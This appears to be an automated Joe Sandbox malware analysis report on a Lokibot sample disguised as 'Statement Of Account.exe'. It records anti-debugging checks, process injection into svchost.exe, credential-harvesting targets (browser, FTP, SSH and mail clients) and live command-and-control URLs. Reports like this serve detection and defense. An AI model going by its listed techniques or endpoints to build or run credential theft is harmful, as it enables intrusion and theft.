Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	10_2_00403D74

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0040E470

Source: C:\Windows\SysWOW64\svchost.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: Statement Of Account.exe, 00000005.00000002.2103795150.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\c
Source: Statement Of Account.exe, 00000000.00000002.2061145880.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c18-806e6f6e6963}#0000000007500000#{f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C22
Source: svchost.exe, 0000000A.00000002.3296137743.0000000002E00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_0045A259 BlockInput,

0_2_0045A259

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,

0_2_0040D6D0

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,

0_2_0040EB70

Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_03E4F128 mov eax, dword ptr fs:[00000030h]	0_2_03E4F128
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_03E4F0C8 mov eax, dword ptr fs:[00000030h]	0_2_03E4F0C8
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_03E4DAA8 mov eax, dword ptr fs:[00000030h]	0_2_03E4DAA8
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_03D5C118 mov eax, dword ptr fs:[00000030h]	3_2_03D5C118
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_03D5C0B8 mov eax, dword ptr fs:[00000030h]	3_2_03D5C0B8
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_03D5AA98 mov eax, dword ptr fs:[00000030h]	3_2_03D5AA98
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 5_2_03C7E4F8 mov eax, dword ptr fs:[00000030h]	5_2_03C7E4F8
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 5_2_03C7CE78 mov eax, dword ptr fs:[00000030h]	5_2_03C7CE78
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 5_2_03C7E498 mov eax, dword ptr fs:[00000030h]	5_2_03C7E498
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 7_2_03E2C0C8 mov eax, dword ptr fs:[00000030h]	7_2_03E2C0C8
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 7_2_03E2C128 mov eax, dword ptr fs:[00000030h]	7_2_03E2C128
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 7_2_03E2AAA8 mov eax, dword ptr fs:[00000030h]	7_2_03E2AAA8
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 9_2_03D7C4F0 mov eax, dword ptr fs:[00000030h]	9_2_03D7C4F0
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 9_2_03D7AE70 mov eax, dword ptr fs:[00000030h]	9_2_03D7AE70
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 9_2_03D7C490 mov eax, dword ptr fs:[00000030h]	9_2_03D7C490
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00124610 mov eax, dword ptr fs:[00000030h]	10_2_00124610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00124610 mov eax, dword ptr fs:[00000030h]	10_2_00124610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00124610 mov eax, dword ptr fs:[00000030h]	10_2_00124610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00124610 mov eax, dword ptr fs:[00000030h]	10_2_00124610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00124410 mov eax, dword ptr fs:[00000030h]	10_2_00124410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00124410 mov eax, dword ptr fs:[00000030h]	10_2_00124410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_001256A0 mov eax, dword ptr fs:[00000030h]	10_2_001256A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_001256A0 mov ecx, dword ptr fs:[00000030h]	10_2_001256A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00123540 mov eax, dword ptr fs:[00000030h]	10_2_00123540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00123540 mov eax, dword ptr fs:[00000030h]	10_2_00123540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00123540 mov eax, dword ptr fs:[00000030h]	10_2_00123540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00123060 mov eax, dword ptr fs:[00000030h]	10_2_00123060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00123060 mov eax, dword ptr fs:[00000030h]	10_2_00123060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00123060 mov eax, dword ptr fs:[00000030h]	10_2_00123060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00123060 mov eax, dword ptr fs:[00000030h]	10_2_00123060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0040317B mov eax, dword ptr fs:[00000030h]	10_2_0040317B

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_00426DA1

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0042202E SetUnhandledExceptionFilter,	0_2_0042202E
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004230F5
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00417D93
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00421FA7
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0042202E SetUnhandledExceptionFilter,	3_2_0042202E
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_004230F5
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00417D93
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00421FA7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_001233C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,	10_2_001233C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00125848 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00125848

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 94.156.177.220 80

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Statement Of Account.exe

Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Statement Of Account.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2908008

Jump to behavior

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_0043916A LogonUserW,

0_2_0043916A

Source: C:\Users\user\Desktop\Statement Of Account.exe

0_2_0040D6D0

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_004375B0

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,

0_2_00436431

Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00445DD3

Source: Statement Of Account.exe	Binary or memory string: Shell_TrayWnd
Source: Statement Of Account.exe, 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmp, Statement Of Account.exe, 00000003.00000002.2077722636.0000000000482000.00000040.00000001.01000000.00000003.sdmp, Statement Of Account.exe, 00000005.00000002.2103328212.0000000000482000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_00410D10 cpuid

0_2_00410D10

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_004223BC

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_004711D2 GetUserNameW,

0_2_004711D2

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0040E470

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Statement Of Account.exe PID: 6976, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Statement Of Account.exe PID: 6540, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Statement Of Account.exe PID: 1124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Statement Of Account.exe PID: 6568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Statement Of Account.exe PID: 6416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5648, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000A.00000002.3296173154.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\SysWOW64\svchost.exe	Code function: PopPassword		10_2_0040D069
Source: C:\Windows\SysWOW64\svchost.exe	Code function: SmtpPassword		10_2_0040D069

Source: Statement Of Account.exe, 00000009.00000002.2139551360.0000000000482000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
Source: Statement Of Account.exe	Binary or memory string: WIN_XP
Source: Statement Of Account.exe	Binary or memory string: WIN_XPe
Source: Statement Of Account.exe	Binary or memory string: WIN_VISTA
Source: Statement Of Account.exe	Binary or memory string: WIN_7

Source: Yara match	File source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_004741BB
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,	0_2_0046483C
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,	0_2_0047AD92
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	3_2_004741BB
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,	3_2_0046483C
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,	3_2_0047AD92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00126BB0 RpcServerUnregisterIfEx,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	10_2_00126BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00126AF0 EnterCriticalSection,RpcServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	10_2_00126AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00126B60 RpcServerUnregisterIf,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	10_2_00126B60

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Service Execution	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	3 Windows Service	2 Valid Accounts	21 Obfuscated Files or Information	2 Credentials in Registry	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	11 Software Packing	NTDS	117 System Information Discovery	Distributed Component Object Model	21 Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	3 Windows Service	1 DLL Side-Loading	LSA Secrets	221 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	312 Process Injection	1 Masquerading	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	312 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Statement Of Account.exe	47%	ReversingLabs	Win32.Trojan.AutoitInject
Statement Of Account.exe	68%	Virustotal		Browse
Statement Of Account.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
94.156.177.220/skipo/five/fre.php	19%	Virustotal	Browse
http://alphastand.trade/alien/fre.php	16%	Virustotal	Browse
http://alphastand.win/alien/fre.php	14%	Virustotal	Browse
http://kbfvzoboss.bid/alien/fre.php	16%	Virustotal	Browse

Name	Malicious	Antivirus Detection	Reputation
http://94.156.177.220/skipo/five/fre.php	true		unknown
94.156.177.220/skipo/five/fre.php	true	19%, Virustotal, Browse	unknown
http://kbfvzoboss.bid/alien/fre.php	true	16%, Virustotal, Browse	unknown
http://alphastand.win/alien/fre.php	true	14%, Virustotal, Browse	unknown
http://alphastand.trade/alien/fre.php	true	16%, Virustotal, Browse	unknown
http://alphastand.top/alien/fre.php	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ibsensoftware.com/	svchost.exe, svchost.exe, 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.177.220	unknown	Bulgaria		43561	NET1-ASBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1543094
Start date and time:	2024-10-27 08:49:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Statement Of Account.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/3@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 43 Number of non-executed functions: 325
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:50:15	API Interceptor	94x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94.156.177.220	Purchase order.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220/simple/five/fre.php
	Payment Advice.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220/logs/five/fre.php
